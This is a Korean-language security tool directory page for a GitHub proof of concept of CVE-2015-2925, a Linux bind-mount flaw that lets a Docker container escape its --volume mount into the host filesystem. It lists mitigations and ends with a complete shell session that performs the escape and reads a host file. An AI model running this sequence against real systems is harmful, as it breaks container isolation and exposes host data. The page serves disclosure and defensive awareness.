Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
docker_cve-2015-2925 — Docker + CVE-2015-2925 = --volume에서 탈출 | Kitploit
도구/GitHubGitHub/kagami/docker_cve-2015-2925
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingRed TeamingContainer Escape
GitHubkagami/docker_cve-2015-2925

docker_cve-2015-2925

Docker + CVE-2015-2925 = --volume에서 탈출

저장소 보기
112311년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Docker + CVE-2015-2925 = --volume 바인드 마운트에서 탈출

Linux의 최근 취약점은 약 반년 동안 알려져 왔으며(몇 달간 공개됨) 바인드 마운트에서 탈출할 수 있게 합니다. 특히 Docker의 경우 --volume 옵션을 통해 마운트된 디렉토리 내부에서 해당 호스트의 파일시스템으로 탈출할 수 있습니다.

Docker 보안 팀은 이미 이 문제를 인지하고 있으며, 대중의 관심을 끌기 위해 공개를 허용했습니다.

Jann Horn이 지적해 주셔서 감사합니다. 기본적으로 저는 이를 재현했을 뿐입니다.

완화 조치

다음 중 하나라도 충분합니다:

  • AppArmor가 활성화된 커널 및 AppArmor Docker 프로필
  • SELinux가 활성화된 커널 및 SELinux Docker 정책
  • 커널에서 사용자 네임스페이스 비활성화

참고 사항

  • 아직 업스트림이나 배포판에서 수정되지 않았으며, 최신 커널에서 동작합니다.
  • 컨테이너 내부에서 root 권한이 필요하지 않습니다.
  • 배포판마다 util-linux 패키지(여기에는 unshare(1)이 포함됨)의 다른 버전을 제공하며, 경우에 따라 "Operation not permitted"를 반환할 수 있습니다. Debian Jessie의 패키지는 예상대로 작동하는 것으로 확인되었습니다.

개념 증명

root@kitploit:~
# uname -r
3.18.9-aufs
# zgrep USER_NS /proc/config.gz
CONFIG_USER_NS=y
# docker -v
Docker version 1.6.1, build 97cd073
# docker pull debian:jessie
# mkdir /test && chmod 777 /test
# echo escaped > /etc/hostdata && chmod 644 /etc/hostdata
# docker run -i -t --rm -v /test:/test -u nobody debian:jessie
nobody@fc8925af0f19:/$ unshare -m -U -r /bin/bash
root@fc8925af0f19:/# cd /test
root@fc8925af0f19:/test# mkdir A A/B C D
root@fc8925af0f19:/test# mount --bind A D
root@fc8925af0f19:/test# cd D/B
root@fc8925af0f19:/test/D/B# mv /test/A/B /test/C
root@fc8925af0f19:/test/D/B# cat ../../../etc/hostdata
escaped
도구 다운로드